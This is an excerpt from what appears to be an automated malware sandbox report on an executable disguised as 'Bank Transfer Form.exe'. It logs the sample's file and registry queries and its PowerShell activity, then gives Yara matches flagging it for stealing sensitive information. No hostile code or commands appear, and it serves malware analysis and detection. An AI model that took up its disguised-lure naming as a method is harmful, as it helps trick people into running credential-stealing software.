                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Users\user\Desktop\Bank Transfer Form.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000003.00000002.4140066639.0000000003281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.4990830.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.Bank Transfer Form.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Bank Transfer Form.exe PID: 7404, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Bank Transfer Form.exe PID: 7596, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.4990830.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.Bank Transfer Form.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Bank Transfer Form.exe PID: 7404, type: MEMORYSTR
